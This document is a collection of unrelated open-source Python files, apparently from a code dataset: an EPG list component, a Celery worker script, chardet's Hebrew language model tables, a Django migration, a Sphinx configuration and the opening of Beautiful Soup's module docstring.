def sortSingleEPG(self, type):
list = self.list
if list:
event_id = self.getSelectedEventId()
if type == 1:
list.sort(key=lambda x: (x[4] and x[4].lower(), x[2]))
else:
assert(type == 0)
list.sort(key=lambda x: x[2])
self.l.invalidate()
self.moveToEventId(event_id)
def getSelectedEventId(self):
x = self.l.getCurrentSelection()
return x and x[1]
def moveToService(self,serviceref):
if not serviceref:
return
index = 0
refstr = serviceref.toString()
for x in self.list:
if CompareWithAlternatives(x[1], refstr):
self.instance.moveSelectionTo(index)
break
index += 1
def moveToEventId(self, eventId):
if not eventId:
return
index = 0
for x in self.list:
if x[1] == eventId:
self.instance.moveSelectionTo(index)
break
index += 1
def fillSimilarList(self, refstr, event_id):
t = time()
# search similar broadcastings
if event_id is None:
return
l = self.epgcache.search(('RIBND', 1024, eEPGCache.SIMILAR_BROADCASTINGS_SEARCH, refstr, event_id))
if l and len(l):
l.sort(key=lambda x: x[2])
self.l.setList(l)
self.selectionChanged()
print time() - t
def applySkin(self, desktop, parent):
def warningWrongSkinParameter(string):
print "[EPGList] wrong '%s' skin parameters" % string
def setEventItemFont(value):
self.eventItemFont = parseFont(value, ((1,1),(1,1)))
def setEventTimeFont(value):
self.eventTimeFont = parseFont(value, ((1,1),(1,1)))
def setIconDistance(value):
self.iconDistance = int(value)
def setIconShift(value):
self.dy = int(value)
def setTimeWidth(value):
self.tw = int(value)
def setColWidths(value):
self.col = map(int, value.split(','))
if len(self.col) == 2:
self.skinColumns = True
else:
warningWrongSkinParameter(attrib)
def setColGap(value):
self.colGap = int(value)
for (attrib, value) in self.skinAttributes[:]:
try:
locals().get(attrib)(value)
self.skinAttributes.remove((attrib, value))
except:
pass
self.l.setFont(0, self.eventItemFont)
self.l.setFont(1, self.eventTimeFont)
return GUIComponent.applySkin(self, desktop, parent)
|
devmax59/cloudtunes
|
refs/heads/master
|
cloudtunes-server/cloudtunes/worker.py
|
14
|
"""
Main script for Celery worker.
"""
from __future__ import absolute_import
from celery.app import Celery
from cloudtunes import settings
celery = Celery(
'tasks',
broker='redis://{host}:6379/1'.format(**settings.REDIS)
)
celery.conf.CELERY_DISABLE_RATE_LIMITS = True
celery.conf.CELERY_IMPORTS = [
'cloudtunes.services.dropbox.sync',
'cloudtunes.services.youtube.sync',
'cloudtunes.services.facebook.sync',
'cloudtunes.mail',
]
def main():
celery.start()
if __name__ == '__main__':
main()
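# A hedged usage note (added for illustration; settings.REDIS is not shown
# here, so the host is an assumption): with settings.REDIS = {"host":
# "localhost"} the broker URL becomes "redis://localhost:6379/1", and the
# worker can be started with
#   python -m cloudtunes.worker worker --loglevel=info
# since celery.start() parses the remaining command-line arguments.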
|
shuishoudage/CloudappCLI
|
refs/heads/master
|
env/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langhebrewmodel.py
|
2762
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Simon Montagu
# Portions created by the Initial Developer are Copyright (C) 2005
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Shoshannah Forbes - original C code (?)
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually do not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Windows-1255 language model
# Character Mapping Table:
win1255_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253, 69, 91, 79, 80, 92, 89, 97, 90, 68,111,112, 82, 73, 95, 85, # 40
78,121, 86, 71, 67,102,107, 84,114,103,115,253,253,253,253,253, # 50
253, 50, 74, 60, 61, 42, 76, 70, 64, 53,105, 93, 56, 65, 54, 49, # 60
66,110, 51, 43, 44, 63, 81, 77, 98, 75,108,253,253,253,253,253, # 70
124,202,203,204,205, 40, 58,206,207,208,209,210,211,212,213,214,
215, 83, 52, 47, 46, 72, 32, 94,216,113,217,109,218,219,220,221,
34,116,222,118,100,223,224,117,119,104,125,225,226, 87, 99,227,
106,122,123,228, 55,229,230,101,231,232,120,233, 48, 39, 57,234,
30, 59, 41, 88, 33, 37, 36, 31, 29, 35,235, 62, 28,236,126,237,
238, 38, 45,239,240,241,242,243,127,244,245,246,247,248,249,250,
9, 8, 20, 16, 3, 2, 24, 14, 22, 1, 25, 15, 4, 11, 6, 23,
12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.4004%
# first 1024 sequences: 1.5981%
# rest sequences: 0.087%
# negative sequences: 0.0015%
HebrewLangModel = (
0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0,
3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,
1,2,1,2,1,2,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,
1,2,1,3,1,1,0,0,2,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,1,2,2,1,3,
1,2,1,1,2,2,0,0,2,2,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,2,2,2,3,2,
1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,2,3,2,2,3,2,2,2,1,2,2,2,2,
1,2,1,1,2,2,0,1,2,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,0,2,2,2,2,2,
0,2,0,2,2,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,0,2,2,2,
0,2,1,2,2,2,0,0,2,1,0,0,0,0,1,0,1,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,2,1,2,3,2,2,2,
1,2,1,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,1,0,2,0,2,
0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,2,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,2,3,2,2,3,2,1,2,1,1,1,
0,1,1,1,1,1,3,0,1,0,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0,
0,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,2,1,2,3,3,2,3,3,3,3,2,3,2,1,2,0,2,1,2,
0,2,0,2,2,2,0,0,1,2,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,1,2,2,3,3,2,3,2,3,2,2,3,1,2,2,0,2,2,2,
0,2,1,2,2,2,0,0,1,2,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,2,3,3,2,2,2,3,3,3,3,1,3,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,3,3,2,3,2,2,2,1,2,2,0,2,2,2,2,
0,2,0,2,2,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,1,3,2,3,3,2,3,3,2,2,1,2,2,2,2,2,2,
0,2,1,2,1,2,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,2,3,2,3,3,2,3,3,3,3,2,3,2,3,3,3,3,3,2,2,2,2,2,2,2,1,
0,2,0,1,2,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,3,3,3,2,1,2,3,3,3,3,3,3,3,2,3,2,3,2,1,2,3,0,2,1,2,2,
0,2,1,1,2,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,2,0,
3,3,3,3,3,3,3,3,3,2,3,3,3,3,2,1,3,1,2,2,2,1,2,3,3,1,2,1,2,2,2,2,
0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,0,2,3,3,3,1,3,3,3,1,2,2,2,2,1,1,2,2,2,2,2,2,
0,2,0,1,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,3,3,3,3,3,2,3,3,3,2,2,3,3,3,2,1,2,3,2,3,2,2,2,2,1,2,1,1,1,2,2,
0,2,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,
1,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,3,1,2,2,2,2,3,2,3,1,1,2,2,1,2,2,1,1,0,2,2,2,2,
0,1,0,1,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,2,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
3,2,2,1,2,2,2,2,2,2,2,1,2,2,1,2,2,1,1,1,1,1,1,1,1,2,1,1,0,3,3,3,
0,3,0,2,2,2,2,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
2,2,2,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,1,2,2,2,1,1,1,2,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,0,0,0,0,
0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,1,0,2,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,3,1,1,2,2,2,2,2,1,2,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,0,1,1,1,1,0,
0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,1,1,1,1,2,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0,
2,1,1,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,1,2,1,2,1,1,1,1,0,0,0,0,
0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,1,2,2,2,2,2,2,2,2,2,2,1,2,1,2,1,1,2,1,1,1,2,1,2,1,2,0,1,0,1,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,1,2,2,2,1,2,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,2,1,2,1,1,0,1,0,1,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0,
0,1,1,1,2,1,2,2,2,0,2,0,2,0,1,1,2,1,1,1,1,2,1,0,1,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,1,0,0,0,0,0,1,0,1,2,2,0,1,0,0,1,1,2,2,1,2,0,2,0,0,0,1,2,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,2,1,2,0,2,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,1,2,2,0,0,1,0,0,0,1,0,0,1,
1,1,2,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,2,1,
0,2,0,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1,
2,0,1,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,2,1,1,2,0,1,0,0,0,1,1,0,1,
1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,0,0,2,1,1,2,0,2,0,0,0,1,1,0,1,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,2,2,1,2,1,1,0,1,0,0,0,1,1,0,1,
2,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,2,1,1,1,0,2,1,1,0,0,0,2,1,0,1,
1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,0,2,1,1,0,1,0,0,0,1,1,0,1,
2,2,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,0,1,2,1,0,2,0,0,0,1,1,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,
0,1,0,0,2,0,2,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,
1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,2,1,1,1,1,1,0,1,0,0,0,0,1,0,1,
0,1,1,1,2,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0,
)
Win1255HebrewModel = {
'charToOrderMap': win1255_CharToOrderMap,
'precedenceMatrix': HebrewLangModel,
'mTypicalPositiveRatio': 0.984004,
'keepEnglishLetter': False,
'charsetName': "windows-1255"
}
# flake8: noqa
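# Worked example of the tables above (added comments, not part of the
# original module): win1255_CharToOrderMap[ord('a')] == 50 and
# win1255_CharToOrderMap[ord('e')] == 42, i.e. frequent letters get small
# order values. chardet's single-byte prober then scores consecutive
# character pairs by indexing the precedence matrix with those orders
# (only the most frequent 64 orders participate in the matrix).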
|
barberscore/barberscore-api
|
refs/heads/master
|
project/apps/registration/migrations/0009_auto_20190909_0637.py
|
3
|
# Generated by Django 2.2.5 on 2019-09-09 13:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('registration', '0008_auto_20190909_0626'),
]
operations = [
migrations.AlterField(
model_name='assignment',
name='area',
field=models.CharField(blank=True, default='', help_text='\n Free-form field (based on district)', max_length=10),
),
migrations.AlterField(
model_name='entry',
name='area',
field=models.CharField(blank=True, default='', help_text='Free-form field (based on district)', max_length=255),
),
]
|
lcdb/lcdblib
|
refs/heads/master
|
docs/conf.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lcdblib documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this docs directory
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lcdblib
import guzzle_sphinx_theme
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.viewcode', 'sphinx.ext.napoleon',
'guzzle_sphinx_theme',
]
napoleon_numpy_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lcdblib'
copyright = u"2016, lcdb"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lcdblib.__version__
# The full version, including alpha/beta/rc tags.
release = lcdblib.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = guzzle_sphinx_theme.html_theme_path()
html_theme = 'guzzle_sphinx_theme'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lcdblibdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lcdblib.tex',
u'lcdblib Documentation',
u'lcdb', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lcdblib',
u'lcdblib Documentation',
[u'lcdb'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lcdblib',
u'lcdblib Documentation',
u'lcdb',
'lcdblib',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
z1gm4/desarrollo_web_udp
|
refs/heads/dev
|
env/lib/python2.7/site-packages/bs4/__init__.py
|
38
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
